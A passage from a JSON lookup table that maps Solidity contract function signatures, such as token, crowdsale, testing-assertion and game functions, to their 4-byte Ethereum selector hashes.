"trade(address,uint256,address,address,uint256,bool)": "0x6cf69811", "approveWithdrawAddress(address,address,bool)": "0x546dc71c", "assertEq17(bytes17,bytes17)": "0x8eb976ca", "assertEq17(bytes17,bytes17,bytes32)": "0xcf06b141", "assertEq16(bytes16,bytes16)": "0x74780111", "assertEq16(bytes16,bytes16,bytes32)": "0xa6abbad6", "assertEq15(bytes15,bytes15)": "0x4631e15b", "assertEq15(bytes15,bytes15,bytes32)": "0x86673464", "assertEq14(bytes14,bytes14)": "0x4651f716", "assertEq14(bytes14,bytes14,bytes32)": "0xbd853960", "assertEq13(bytes13,bytes13)": "0x5142c3ec", "assertEq13(bytes13,bytes13,bytes32)": "0x3b098c8c", "assertEq12(bytes12,bytes12)": "0xe4dbc385", "assertEq12(bytes12,bytes12,bytes32)": "0x5d8bc2a8", "assertEq11(bytes11,bytes11)": "0x38ec8736", "assertEq11(bytes11,bytes11,bytes32)": "0x65153632", "assertEq10(bytes10,bytes10)": "0xf8bdbb60", "assertEq10(bytes10,bytes10,bytes32)": "0xd539a226", "assertEq9(bytes9,bytes9)": "0xd1a3d3ad", "assertEq9(bytes9,bytes9,bytes32)": "0x74b9dc6b", "assertEq8(bytes8,bytes8)": "0x263eb5b6", "assertEq8(bytes8,bytes8,bytes32)": "0x054550f3", "assertEq7(bytes7,bytes7)": "0x34d9aee3", "assertEq7(bytes7,bytes7,bytes32)": "0x8f12355d", "assertEq6(bytes6,bytes6)": "0x269724ef", "assertEq6(bytes6,bytes6,bytes32)": "0xa536cffd", "assertEq5(bytes5,bytes5)": "0x84570d0d", "assertEq5(bytes5,bytes5,bytes32)": "0x38856ecb", "assertEq4(bytes4,bytes4)": "0x09d78fba", "assertEq4(bytes4,bytes4,bytes32)": "0x19a7e59d", "assertEq3(bytes3,bytes3)": "0x7857fcda", "assertEq3(bytes3,bytes3,bytes32)": "0x3d82e1b1", "assertEq2(bytes2,bytes2)": "0x4c4a4c67", "assertEq2(bytes2,bytes2,bytes32)": "0xccc62bbe", "assertEq1(bytes1,bytes1)": "0x1472d56a", "assertEq1(bytes1,bytes1,bytes32)": "0x9c90224b", "assertEq(address,address)": "0x515361f6", "assertEq(address,address,bytes32)": "0xe2047589", "assertEq(int256,int256)": "0xfe74f05b", "assertEq(int256,int256,bytes32)": "0x200b894d", "assertEq(uint256,uint256)": "0x98296c54", "assertEq(uint256,uint256,bytes32)": "0xe85efc50", "assertEq(bool,bool)": "0xf7fe3477", "assertEq(bool,bool,bytes32)": "0xf10968ea", "assertEqDecimal(uint256,uint256,uint256)": "0x27af7d9c", "assertEqDecimal(int256,int256,uint256)": "0x48016c04", "assertEq0(bytes,bytes,bytes32)": "0xf1183e21", "assertFalse(bool,bytes32)": "0xaae764c1", "assertTrue(bool,bytes32)": "0x640ec47a", "mul2Assert(uint256)": "0xa503473a", "mul2Revert(uint256)": "0x6a018302", "mul2Throw(uint256)": "0x23c5e967", "sendWei()": "0x57bce8b0", "SplitSend(address,address)": "0x7c9f4941", "closeChannel(bytes,uint256,uint8,bytes32,bytes32)": "0xf0feef96", "getHash(bytes,uint256)": "0x15ae0629", "StateChannel(address,address,address,address,uint256,bytes)": "0x2cdedd5c", "getEntityList(bytes32[],uint8[])": "0xdbf7dc0c", "getUIntTypesCount(uint8[])": "0x1eb02078", "getUIntValueConverted(bytes32,uint8,uint256)": "0xdacf9483", "booleanToUInt(bool)": "0x2ec86103", "deleteIntValue(bytes32)": "0x8267a9ee", "deleteBytes32Value(bytes32)": "0x124f2418", "setBytes32Value(bytes32,bytes32)": "0x25cf512d", "getBytes32Value(bytes32)": "0x025ec81a", "deleteBytesValue(bytes32)": "0x0c55d925", "deleteAddressValue(bytes32)": "0x043106c0", "deleteStringValue(bytes32)": "0xba69fcaa", "deleteUIntValue(bytes32)": "0x93fe4248", "deleteUInt8Value(bytes32)": "0x84d7c99d", "setUInt8Value(bytes32,uint8)": "0x0bd85158", "getUInt8Value(bytes32)": "0x7a0e03ec", "getAllowedContracts()": "0x538741c5", "allowedContractsCount()": "0x50e036ff", "removeAllowedContracts(address[])": "0x89a9453a", "EthlanceDB()": "0xc95292c4", "disable(uint256)": "0x9946b9a5", "claimantConvicted(uint256)": "0x000dae5c", "challengerConvicted(uint256)": "0x9e84d44d", "timeout(uint256)": "0x08148f7a", "performStepVerification(uint256,bytes,bytes,bytes)": "0x24ddb58c", "respond(uint256,uint256,bytes32)": "0x56111751", "query(uint256,uint256)": "0xaf6682ab", "claimComputation(bytes,bytes,uint256)": "0x3e92fa26", "checkHardCap(uint256)": "0x5dac7044", "setHardCap(uint256,uint256)": "0x65ad9f34", "hashHardCap(uint256,uint256)": "0x5ee760a5", "MultiCappedCrowdsale(uint256,bytes32,uint256)": "0x2a909257", "getCurrentBlockTime()": "0x898403c3", "balanceOfWithoutUpdate(address)": "0xd37fe6cb", "KryptopyTokenMock()": "0x25096f28", "doProveMemoryWrite(uint256,bytes32,bytes32[])": "0x739b6214", "doProveMemoryRead(uint256,bytes32,bytes32[])": "0x7b2abb34", "doDisputeMemoryAccessSequence(uint256,bytes32)": "0xc9d27bcf", "doDisputeMemoryWrite(uint256,bytes32,uint256)": "0x13414a4e", "doDisputeMemoryRead(uint256,bytes32,uint256)": "0xc37cdcfe", "doProvideMemoryAccesses(uint256,bytes32,uint256[],uint256[])": "0x3b6e8ec3", "doSelectDisputedStateRoot(uint256,bytes32,uint256)": "0x8d50b6d0", "doProvideStateRoots(uint256,bytes32,bytes32[])": "0x52eae80b", "doTimeoutForDefendant(uint256)": "0xb82e6416", "doTimeoutForComplainant(uint256)": "0x5ac0dc11", "isResolvedForDefendant(uint256)": "0x9d3acf23", "totalLimitUSDWEI()": "0xe63d4957", "oraclizeBalance()": "0xc4218d33", "H4DAddress()": "0x2f851184", "addtokens()": "0xec25adf4", "timeout()": "0x70dea79a", "fundsClaimed()": "0x5c6a0246", "TACTICALCRUISER_FTL_SPEED()": "0xfedb6dfd", "minBetSize()": "0x61d5f225", "tokensInEth()": "0x94a2301e", "otherSupply()": "0x9f7c8851", "robotCoin()": "0xf0ae03be", "issueOfTokens()": "0xc1b082b6", "sumElements(uint256[])": "0xf2ab9384", "leverage()": "0x2c86d98e", "getProposalTextArrayLength()": "0x0ae8f28f", "canPurchase()": "0x34a6d832", "be()": "0x47ec8e21", "closeAt()": "0xa9854087", "bountyTokenIssuedTotal()": "0x088ee7ec", "BTTPERETH()": "0x276cd2e8", "initialICOCap()": "0xa8d9a89a", "formulaPrecision()": "0x47be7bce", "etheraffle()": "0x8ca17755", "flowerTotalSupply()": "0x8a45557e", "slopeDuration()": "0x89c9c586", "mintedCrowdsale()": "0x100a5ec5", "currentJackpotInWei()": "0xc6560856", "iconToken()": "0x7081150a", "getProposedOwner()": "0xeae5a62d", "lastBlock_a10()": "0x9a465b85", "icoStartTimestampStage4()": "0x5ddb2585", "balanceTreasury()": "0xe5e2fd7b", "waveCap4()": "0x69f173dc", "ccReleaseBlock()": "0x8a957f15", "didOwnerEndCrowdsale()": "0xdce59311", "FLIPPINESSROUNDBONUS()": "0x59828c99", "softcapReached()": "0x6eb21929", "PRESALE_TOKEN_SUPPLY_LIMIT()": "0xe92e5f03", "appstore_share()": "0xf101b269", "CONVERSION_DECIMAL_FACTOR()": "0x2ba11f2a", "lastOraclePrice()": "0x349f7173", "totalFeeFlows()": "0x47a36afd", "currentOperation()": "0xf05396ac", "hon2backup()": "0xc005dc7b", "allowedSinceReadable()": "0x8ad20640", "openDistributionContract()": "0xa297d43c", "PLATINUM_AMOUNT_XPER()": "0x87e06546", "reserveAllocated()": "0x25384770", "foundation_coins()": "0x112dd4fd", "playersSignedUp()": "0x52bafde9", "STUDToEth()": "0x80994e15", "isInPreSale()": "0x7afde96b", "isReserveSupplyAssigned()": "0x0a80e725", "agencyReceiver()": "0xa6459042", "window3StartTime()": "0x3d814377", "collateralAmount()": "0x92d09ceb", "totalBonusTokensIssued()": "0x98b01fe3", "weekThreeRate()": "0x3daee1b8", "stageIT()": "0x9745ad9c", "lowEtherBonusLimit()": "0xee607ab1", "proxyFactory()": "0xc10f1a75", "eurRaised()": "0x3a3650cf", "ADVISORS_WALLET()": "0x539ff41a", "setToForking()": "0x0957c807", "reservedSupply()": "0x44d19d2b", "JackpotAmount()": "0x6d14b2a8", "taxRate()": "0x771a3a1d", "allTokenICO()": "0x8f76dfc3", "minCapMain()": "0x16671990", "PRE_SALE_END_TIME()": "0x1aece0db", "partnersLockEnd()": "0x8faa6cb7", "futureTokens()": "0x915489f6", "maxCyclePlayersConsidered()": "0xb2550a53", "getOwnerMoney()": "0x625101d5", "ico1Max()": "0xf4dd0fe9", "house()": "0xff9b3acf", "whatSatoshiSays()": "0x74fd08cd", "option10name()": "0xd64232c0", "crowdsaleWeiRaised()": "0x547069bf", "icoPool()": "0xbde8cd4d", "CUSTOM_ERC20_BURN_SERVICE_NAME()": "0x55f48a46", "INVEST_AMOUNT()": "0x4c4cb69e", "GXCSentToETH()": "0xabd117fe", "preSaleRaised()": "0xc4173548", "nextTournamentBank()": "0x51c85565", "m_pools()": "0x375c86dd", "USER_GROWTH_TOKENS_RESERVED()": "0x4c25deb5", "trancheCount()": "0x59eb8224", "last50plushacker()": "0x3f22b0fb", "_ratio()": "0x4330301f", "mainSaleTLYperETH()": "0x413d7b08", "giftSendIndex()": "0xfa332152", "getLockAccounts()": "0xb2369f12", "contractLock()": "0xcf837fad", "FEE()": "0xc57981b5", "lockedTokenBalance()": "0x10ff4a1b", "vaultDeposit()": "0xbe65d27a", "tokensDonated()": "0xe193b735", "tokenPublicSale()": "0xeef90cbe", "maxTokenSupplyICO2()": "0x123c3a4f", "winnerTicket()": "0xb16d2fd1", "minimumPerTransaction()": "0x5eed886b", "isExecuted()": "0x1c9feaa5", "claimB1()": "0x69a1b0e2", "releaseState1()": "0x07c34e73", "privatePreSaleSoldTokens()": "0x35eec76a", "DEBATE_PERIOD_MINUTES()": "0xecc46d1b", "getTotalWinsCount()": "0x2431676c", "currentRewardReleasePercentageRatePerYear()": "0x7c70e7fe", "lastBuyer()": "0x13ecfbfa", "emergency_used()": "0x8464878d", "transferAuthorizations()": "0x63bbe1b5", "currentInvestor()": "0x523e27d4", "maxAffiliate()": "0xb018d65a", "TeamFund()": "0x49e67544", "PERCENT_COMMISSION()": "0x2f004218", "inpreSalePeriod()": "0xba47c5f8", "refundManager()": "0x87174c3e", "DEVCLASS_EXTRACTION_BASE()": "0x0d5302c4", "gracePeriodStart()": "0x86556071", "PHASE4_START_TIME()": "0x0b225b42", "createTokensAnySale()": "0x06122ea8", "predecessor()": "0xb719d032", "catsRemainingToAssign()": "0xea341309", "maximumBuyBackPriceInCents()": "0x01a53d3b", "phase2Cap()": "0xd7638b73", "OperationAddress()": "0x84e2d578", "etherSince50()": "0xc45ad06a", "lastClaimed()": "0xadc1b956", "maxLendingItem()": "0x26a4c847", "secondCrowdSaleEndDate()": "0x339a95f6", "mtdPreAmount()": "0xa6bd853b", "finshCrowdsale()": "0xb14f6439", "presaleFemaleEnd()": "0xca67628f", "ctrtToken()": "0xcae8eb2f", "_totalSupplyLeft()": "0x0b38bae2", "medalBoost()": "0xce7ca665", "totContribution()": "0xdbc69521", "transfersAllowed()": "0xb0660c3d", "pricePerStake()": "0xc074313f", "_thresholdOne()": "0xb081cfc5", "usdPerEth()": "0x60bce2f4", "preCap()": "0x5e19deda", "loveUrl()": "0xa7507df2", "releaseCreatedCount()": "0x088ae6e5", "FiCoinFundDeposit()": "0x00a051ca", "vestingWallet()": "0x0a5ab11d", "poolEthSold()": "0x8e81c579", "icoRound4()": "0xcb2e1d10", "tokenXstepCAP()": "0xa55c974f", "maxTokenSupply()": "0x50f7c204", "foundationAddr()": "0xfeafb79b", "mFUNDING_SALE_TIMESTAMP()": "0x763430b8", "getBrands()": "0x822d487d", "yearCap()": "0x559b0432", "maxTokenSupplyPreICO()": "0xf7759c84", "reservedTokensClaimStage()": "0xdf1a5aab", "pantryT()": "0xacbcabc0", "lastStealBlockNumber()": "0xe94aea8a", "Group_5()": "0x2d91ad22", "wingsTokensReserv()": "0x6283440b", "winNetworkFeeBasisPoints()": "0x1359844a", "sharesRaised()": "0x6f47e218", "backToOldOwner()": "0xe4277f78", "firstPreSaleEndDate()": "0xd30047bc", "claimPartnerTokens()": "0x049a2dd1", "tokenized()": "0x6b59f495", "maxSupplyGenerable()": "0x34e4c06d", "MobileAppSupply()": "0xcb65ad66", "SaleIsLive()": "0x50a09d60", "withdrawToInvestor()": "0x912308dc", "tokenFrozenUntilNotice()": "0x577ccfe0", "crowdsaleAllowance()": "0x65fba60d", "killAborted()": "0x042ae62b", "unitRareGrowth()": "0xc8bb7d51", "TERMS_AND_CONDITION()": "0x37e922d7", "pricePause()": "0x739bdcff", "PRIVATESALE_END_DATE()": "0xbf53fa61", "origMktValue()": "0x78296854", "transferStep()": "0x727b4094", "partner2_signed()": "0x84b08d41", "taskTotalBalance()": "0xd7d12297", "upgradedVersion()": "0xaf05fa10", "AgriChainNextData()": "0x091691c5", "tokenSaleAddress()": "0x1448b3ca", "_sellprice()": "0xde620676", "regularPhase()": "0x214dda84", "isIcoPaused()": "0x09f64d2e", "debugResetSubmissions()": "0x5eadd607", "mintingActive()": "0x31f9c919", "eth_meth()": "0xa1c4db02", "oraclizeQueryId()": "0x2583a1d9", "totalWeiAmountSale3()": "0xc547d8f1", "PiBetaSupply()": "0x2c8082a6", "stamp()": "0xc85e07b9", "confirmTime()": "0x98bd5663", "roundLeader()": "0xa51a6054", "rewardsTokensVault()": "0xae75c4f7", "totalLevs()": "0xa675807e", "DRAW()": "0x619d36ef", "MarketPlace(address,address,uint256,uint256,address)": "0x3761dea8", "balanceAtBlock(address,uint256)": "0xb7d5d74c", "latestReferenceBlockNumber()": "0x31666156", "registerBalanceForReference(address,uint256)": "0x6c27b211", "AgoraToken()": "0xdb6c9416", "AwesomeToken()": "0x1b963742", "freezeAccount(address,bool,uint256,uint256)": "0x84e4d3a8", "AdvanceToken()": "0xf3b303cd", "BaseToken(string,string)": "0x2b4d0450", "delSaleOwner(address)": "0x4ec7b58b", "addSaleOwner(address)": "0x5d346bd6", "addTeamAndAdvisorsAllocation(address,uint256)": "0xf70eabff", "TeamAndAdvisorsAllocation(address,uint256)": "0x4ce1e317", "DiamondToken()": "0x0b31fc3a", "TestToken(string,string,uint8,uint256)": "0x9eaeccf1", "GTBToken()": "0x45b30e7a", "AcademiCon()": "0xd25b3ee1", "SmartDollar()": "0x604e3588", "referralAmountInvest(address)": "0xabd5100d", "calc_partnerPercent(address)": "0xc6de5709", "checkPartner(address,address)": "0x44938e94", "setPartnerPercent(address,uint16)": "0xca1ad32c", "setReferralPercent(uint16)": "0xcc2eacb1", "ThinkCoin(uint256)": "0xc95c9a83", "getBonusTokens(uint256)": "0x7976eaa2", "BonusScheme()": "0x349136af", "TransferBy(address,address,uint256)": "0xfd651d2c", "set_centralAccount(address)": "0x97668720", "isDeholdable()": "0xbc7e8d3c", "hodlCountdown()": "0x77a1ec4b", "releaseTheHodl()": "0x2b1e5016", "HodlBox(uint256)": "0x672ce152", "TokenCrowdsale(address)": "0xbb1e54bc", "transferLockedPart(address,uint256)": "0xb8852718", "unlockAddress(address)": "0xb7eb5e0a", "lockAddress(address)": "0x34a90d02", "allowCrowdsaleAddress(address)": "0xdcfda779", "ERC20(string,string,uint8)": "0x702617e7", "changeWalletOwner(address)": "0x5e1f56d9", "airDropToOldTokenHolders(address[])": "0x3e085c3d", "changePartnerCoinPercentage(uint256)": "0x751823f2", "checkOwnerShare(address)": "0x76c6fc9a", "tokensRemainingForSale()": "0x12974218", "getCurrentICORoundInfo()": "0x58d0390b", "startNewICORound(uint256,uint256)": "0x3077fdf1", "setMaxBuyLimit(uint256)": "0x757765f8", "pullBack(address)": "0x6a75fac0", "showMyTokenBalance()": "0xea91f8c7", "updateOwnerShares(address[],uint256[])": "0x51dea0ae", "ARBITRAGECrowdsale(address,address)": "0x7c3c4c83", "pullBack(address,address,uint256)": "0x77eefa5a", "ARBITRAGEToken(address)": "0x5a481a7e", "showMyTokenBalance(address)": "0x8fe47625", "CryptoDime()": "0xce45a260", "CANAToken()": "0x6b565345", "LADYCoin(uint256,string,string)": "0x837cfb34", "AlarmxToken()": "0x055cff88", "purchase(address)": "0x25b31a97", "BitImageTokenSale()": "0x535b27dd", "BitImageToken()": "0xac99e0aa", "withdrawSome(uint256)": "0xae9b051c", "setLive(bool)": "0xf5ee3348", "walkTokenLots(address,address,uint256,uint256,bool,bool,bool)": "0x922b01ca", "sendReceivedTokens(address,address,uint256)": "0x8759d1c3", "multiMint(uint256,uint256[],uint256)": "0x106f77a7", "transferFrom(address,address,address,uint256,uint256,bool,bool)": "0x356d414c", "transfer(address,address,uint256,uint256,bool,bool)": "0xb537752f", "transferDryRun(address,address,uint256,uint256)": "0x4aa1d21b", "checkTransfer(address,address,uint256,uint256)": "0x4e48a495", "setTransferAuthPermission(address,bool)": "0xb8441be0", "setTransferAuthorizations(address)": "0xfbc44458", "setInvestorList(address)": "0x1b8b3605", "setLockoutPeriod(uint256)": "0xa7f365ae", "setAffiliateList(address)": "0x028ae3b7", "setTransferAuthorized(address,address,uint256)": "0xcba6a3a2", "isTransferAuthorized(address,address)": "0xbf101b32", "removeAddresses(address[])": "0xa84eb999", "addAddresses(address[],string)": "0x4175b307", "addAddress(address,string)": "0xd033c456", "inList(address)": "0x25b198eb", "inListAsOf(address,uint256)": "0xf79e2b32", "set(address,uint256,uint256)": "0x8308d7e9", "CrypviserToken(address)": "0xbf9b8b38", "CrypteriumToken()": "0x89c698d4", "lockBalance(address,uint256,uint256)": "0xa5595683", "CJC()": "0x8dc01209", "Sleipnirwallet()": "0x8a55b001", "validateWinnersCount(uint32,uint32,uint32)": "0x18d8ec5b", "scoreKnockouts(bytes32,bytes32,bytes12)": "0x03905f10", "scoreGroups(bytes32,bytes32,bytes32,bytes32)": "0x8bd5d30f", "computeKnockoutPoints(uint8,uint8,uint8,uint8,uint8,uint8,bool)": "0x98a0e1c8", "computeGroupPhasePoints(uint8,uint8)": "0x3c33863c", "getResultData(uint8)": "0xf00e6f0a", "getForecastData(bytes32,bytes32,bytes12,uint8)": "0xca997200", "WithdrawUnclaimed()": "0xb459c3fe", "CancelGameAfterResultsPublished()": "0xa3c68e3d", "CancelGame()": "0xe27e3fd3", "WithdrawPrize()": "0x539fffc9", "VerifyPublishedResults(uint16)": "0x581ff6e2", "PublishWinnersScoreThres(uint16)": "0xdf5b588c", "set_crowdsaleClosed(bool)": "0x8ad30473", "changeOraclizeConfig(bytes32)": "0xda0bba7b", "changeOraclizeProofType(bytes1)": "0x5125796a", "getLossesShare(address)": "0x1514ea54", "Dice5()": "0xcb393ecb", "DoggyToken()": "0x84eb11ce", "isPresalePeriod()": "0xf70dbb77", "getCurrentTokenRate()": "0x4e961921", "SpoutCrowdsale(address,uint256,uint256,address)": "0xa6f70594", "HIROTOKEN()": "0x76be0b89", "setMinimumBuyValue(uint256)": "0xcf0aed0e", "updatePriceAgent(address)": "0x94077c50", "updateEursPerEth(uint256)": "0x7c435e6f", "setEndingTime(uint256)": "0x3473bf30", "setStartingTime(uint256)": "0x3f52e589", "configurationCrowdsale(address,uint256,uint256,address,uint256[],uint256,uint256,uint8,uint256)": "0xd1f6424f", "configurationTokenTranchePricing(uint256[])": "0x491d75f4", "getTranchesLength()": "0xf8a5a8dd", "getDeploymentBlock()": "0x80d1cb35", "DeploymentInfo()": "0x5b0c12a1", "calculateTokenAmount(uint256,address)": "0xe371817e", "returnExcedent(uint256,address)": "0xd9f7e285", "buyOnBehalf(address)": "0xcf16e955", "buyOnBehalfWithCustomerId(address,uint128)": "0x24434852", "buyOnBehalfWithSignedAddress(address,uint128,uint8,bytes32,bytes32)": "0x260a5227", "configurationGenericCrowdsale(address,uint256,uint256)": "0x3ef0784e", "CrowdsaleToken(uint256,uint8,address,address)": "0x38634337", "BrinkToken(uint256,string,uint8,string)": "0xc4faa950", "Reaper11()": "0x1827edbc", "SelfllerySale()": "0xdc541eb7", "getCurrentBonusPercent()": "0x77e6bb15", "calcTotalTokens(uint256,uint256)": "0xef4fac01", "isHardCapTokensReached()": "0xe3db6670", "isFinishDateReached()": "0x29d287ec", "addPreSalePurchaseTokens(address,uint256)": "0x72998ee1", "changeMinimumPurchaseAmount(uint256)": "0xf4572664", "purchaseFor(address)": "0xf6e4641f", "SelfllerySaleFoundation(address,address,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint8)": "0xbeab9848", "nextUnlockTime()": "0xf8737bc0", "balanceOfLockup()": "0xdb80fbc9", "BTHPoint()": "0x0c50b116", "Phoenix()": "0xd36a8026", "rejectOwnership()": "0xf19f3246", "CNYTokenPlus()": "0x721b67ab", "SUSIToken(uint256,string,string)": "0x6339b5f6", "withDrawAmount(uint256)": "0x585eb90c", "Subrosa()": "0xc9dab438", "NecromeunToken()": "0x1f13f165", "FatherToken()": "0x3e345bd8", "request_dividend(address)": "0xc1899ca7", "checkPrevOwner(bytes32)": "0xa5513af5", "checkOwner(bytes32)": "0x7a42a9cd", "ownerCheck()": "0x21e38e81", "NDCOIN()": "0x918f49ec", "YANG()": "0xd3565934", "MIPCoin()": "0x6b36a76e", "vestingCount(address)": "0x3d4ef007", "_addVestor(address,uint256,uint256,uint256,bool)": "0x4b013f85", "addVestor(address,uint256,uint256,uint256)": "0x264caf14", "getFrom()": "0x798fd178", "BOT_ELEMENT_3()": "0x822bd0dd", "Enterprise()": "0x5a055a33", "setTokenBurner(address)": "0xb0af768b", "ETBSToken(address)": "0x0e65e5d9", "SLUTZToken()": "0x2b46e7f8", "CentrallyIssuedToken(address,string,string,uint256,uint256,uint256)": "0xb6ca8996", "transferAssetOwner(address)": "0x3cf26a33", "setFeeParams(uint256,uint256)": "0x9d2ec188", "allowanceByLegacy(address,address)": "0x4cbd2b74", "balanceOfByLegacy(address)": "0x829bd99c", "totalSupplyByLegacy()": "0x6a43dc9a", "getMethodState(string)": "0x2c4617d7", "getMethodValue(string)": "0xccda4b99", "comfirmRedeem(uint256)": "0x4876f3e5", "submitRedeem(uint256)": "0xa657cb9c", "comfirmIsses(uint256)": "0xc678ca19", "submitIssue(uint256)": "0x8bd031fe", "cooRemoveCro(address)": "0xfaea1878", "cooAddCro(address)": "0xdc61456c", "cooRemoveReviewer(address)": "0xcd47c0e1", "cooAddReviewer(address)": "0x2bd2523e", "cooRemoveManager(address)": "0x83879c15", "cooAddManager(address)": "0x585bc523", "ceoRemoveCoo(address)": "0xf69e8384", "ceoAddCoo(address)": "0x6494b55b", "ownerRemoveCeo(address)": "0x50159de6", "ownerAddCeo(address)": "0x83e5cb26", "PAOCoin()": "0x9eeea0d0", "ScicoinsICO()": "0xaa8f0269", "SEPCToken()": "0x03e337d1", "MyBoToken(uint256,string,uint8,string)": "0x8ffeb5c8", "MoonStone()": "0x29995f4c", "AdAgency()": "0x23dc14c0", "revokeBurnDelegate(address)": "0xed52068c", "approveBurnDelegate(address)": "0x68934e54", "revokeMintDelegate(address,int256)": "0x7e999cd9", "approveMintDelegate(address,int256)": "0x524b5cb9", "getBurnDelegates()": "0x50a49f5f", "getMintDelegates()": "0x5b51a6d8", "PMC()": "0x5b353cfa", "ethBioxRate2()": "0x86318bc4", "networkDevelopmentWallet()": "0x389ab31c", "PRE_ICO_START()": "0xd4810b61", "provider2()": "0xc2d4489f", "fiveMatchPayoutInPercent()": "0x379e9957", "Opulentos()": "0xee06eece", "icoEndsAt()": "0x6218fd8b", "drpCrowdsaleRecordedBalance()": "0xb8f7f41e", "SUPPLY()": "0xc50497ae", "divForTank()": "0x4dad66f5", "numChipsMinted()": "0xfb9cb15d", "mintDepositAccount()": "0xc012e179", "phase5EndBlock()": "0x335b7c13", "current_period()": "0x431dc4b6", "preIcoMinimumWei()": "0xa10e057c", "largestDonor()": "0x5e311cd7", "processEmergencyFundReleaseFinished()": "0xb91070e8", "exchangeEnabled()": "0xf5343752", "amountSlicesCount()": "0xe3b6040e", "round_count()": "0xcc7949ae", "secondsBetweenMints()": "0xf82a4707", "paymentsOf()": "0x2d5b8d99", "newBet()": "0x9567a161", "behalfer()": "0x4ac9f0d7", "OPERATION_HOLDER()": "0x78b290b5", "mintAmount1()": "0x69d6b880", "etherollBeneficiary()": "0xd4c72e7f", "gameLogic()": "0x134087a2", "ContractEnabled()": "0x96147933", "initialCost()": "0x9b4f1ecb", "MAX_ACTIVE_CANVAS()": "0x604ce56c", "mapWidth()": "0x8d049190", "dividendDistributionStartTime()": "0xc6220fbd", "unlockTeamAndReserveTokens()": "0x94cddaf1", "dusttorafflepot()": "0x4143125f", "winAmount3()": "0x39785281", "rewardPrivate()": "0x6a7c09a0", "gmtAddress()": "0x38d560b6", "fourthChainETC()": "0x032b13da", "lockAbsoluteDifference()": "0x86aa552a", "TeamAddress()": "0x7ff3366f", "claim_price_money()": "0xc2502d34", "MIN_GOLD_TO_UPGRADE()": "0xbbcbce8e", "angelSupply()": "0xd7fb5ef5", "poolBalance()": "0x96365d44", "totalPot_()": "0xa3f991a5", "PRICE_MULTIPLIER_ICO2()": "0xae9759ff", "MFTU()": "0x2fd23817", "saleEndAtBlock()": "0xb82fb745", "LimitBottom()": "0xb4621d07", "shuliang()": "0x832f6924", "recallVoteToFreezeFund()": "0xcfebb88b", "numRef()": "0xa33ed39d", "PRICE_6()": "0x12267abc", "MarketingDevelopmentAmount()": "0xa820d02e", "awardAmount()": "0xe9893c67", "battleId()": "0x01a1b778", "pauseProposer()": "0x05763ff7", "COMMUNITY_POOL_TOKENS()": "0x515f128b", "createdWallets()": "0xd273285b", "vendorCount()": "0x8858287b", "destroyer()": "0x11367b26", "fundingCapReached()": "0x848b3821", "TotalPaid()": "0xcb9580e0", "PRE_ICO_TOKENS()": "0x9e9ea24b", "Firstsale()": "0xada0114c", "tgrStartBlock()": "0xfb26e2d8", "sibling()": "0xb9659d4a", "totalFee()": "0x1df4ccfc", "validMCAmount()": "0x9655943e", "crowdsaleInitialSupply()": "0x1c92b497", "latestBidder()": "0x67a884e5", "ethIn_()": "0x7326cac8", "tgeStartTime()": "0xf6791858", "ethCollected()": "0xbee2e134", "officialSite()": "0x95d5f6fd", "totalCoinSupply()": "0x3b942742", "mintSelf()": "0x31885119", "angelTokenSupply()": "0xf44349dd", "unpause_1()": "0x54d271fb", "maxCumAcceptedDeposits()": "0x5ec72a90", "successfulPreSale()": "0x3e445506", "PRESALE_WEI_CAP()": "0x2ba6d8fe", "ADMINISTRATOR()": "0x59fe7279", "firstTierDiscountUpperLimitEther()": "0x4ecb02aa", "Securities_4()": "0xeb0eea61", "balance_wirthdraw()": "0xbad9643b", "rateForPhase2()": "0x3c83f7aa", "ownerPrimary()": "0x95910d46", "heroContract()": "0x0daf999a", "flipRewardAmount()": "0x7a8bd93e", "SellTokenToRaj()": "0xf9a94ecd", "secondWeekMainICOBonusEstimate()": "0x895a8cfb", "totalWindows()": "0xb7ad2432", "holderGroupNumber()": "0xc12076f1", "WHOLESALE_THRESHOLD()": "0xe7a95a7f", "LOCKOUT_PERIOD()": "0xd754f0ac", "isLogoInitied()": "0x02b4b52c", "CoefRew()": "0x41d00774", "presaleSold()": "0x48cebd67", "getTokenBySelf()": "0x3bc518ea", "initialSeedFarmingAdress()": "0x6a77e17a", "_totalEthCollected()": "0x658a5692", "getPublicKeyCount()": "0x1880692f", "ausGroupReleaseDate()": "0xa2da2b47", "earlyWhitelistBeginTime()": "0x25d91125", "Funding_Setting_cashback_before_start_wait_duration()": "0x7d722a30", "rewardsWallet()": "0x5b35f9c9", "monethaGateway()": "0x6137412c", "littID()": "0x996b434a", "fairymasterReq()": "0x2b302b60", "publicReservedAddress()": "0xc4f99aa5", "JACK_DIST()": "0x63cf1442", "totalCoinCap()": "0x3b048284", "card_metal_first()": "0xa3641c84", "price4()": "0x27378684", "token_reward()": "0x75c4e9ec", "totalBaseLareSoldInPreSale()": "0x1a7e0c50", "sellExchangeRate()": "0x149f2fdb", "SCORE_TO_WIN()": "0x5cb4502c", "lastTransferQueueIndex()": "0xc8744434", "cashOutFallbackAmount()": "0x6747f09e", "secondMaxAmount()": "0x88a15f11", "MinerEdgeCommunity()": "0x3697efb2", "specialPoolsRate()": "0x9ad7ebc3", "Bounty0xToken()": "0xc7aaa83f", "numberOfClaimants()": "0xd2ba5537", "totalMinted()": "0xa2309ff8", "F()": "0x28811f59", "stageNow()": "0xd9875c93", "COPPER_AMOUNT_SKL()": "0x6872e300", "reserveUnlockTime()": "0xb3b89158", "getPreSaleStart()": "0xbe53f968", "HASHPERETH()": "0x5b06fc49", "isAllocatedLending()": "0x2c5af544", "overdraftCliff()": "0x4ce02a33", "CORE_NAMESPACE()": "0x756f6049", "PRIZE_TOKENS()": "0x47e17101", "votedAddress()": "0x2157320e", "lastProfit()": "0xd9f4ecbb", "housePercent()": "0x39a26069", "promoCutieCreatedCount()": "0xe09ef83e", "tokenDecimal()": "0x5caed029", "superPowerFulDragonOwner()": "0x93a95fa8", "LOTTERY_FUND_SHARE()": "0x5df6461d", "sendProfitsRewardBips()": "0xb837a3b8", "DEV_PORTION()": "0x14838617", "mission()": "0x17701ee6", "period0End()": "0xadd7690b", "start_()": "0x8617457a", "owners()": "0xaffe39c1", "_secondUnlockAmmount()": "0x1da4eb7a", "topFab()": "0x768433c2", "isMaintenanceMode()": "0x6b6cc239", "deathFactor_v()": "0x3a8ed5c4", "setCurrentStage()": "0x516af259", "Loading()": "0x0796c325", "getAdminRevenue()": "0xb563b75d", "reserveLockup()": "0xdaf13a47", "tokensSoldOnPublicRound()": "0x89266fca", "contributionInWei()": "0x0237ef12", "finalyze()": "0x476c089a", 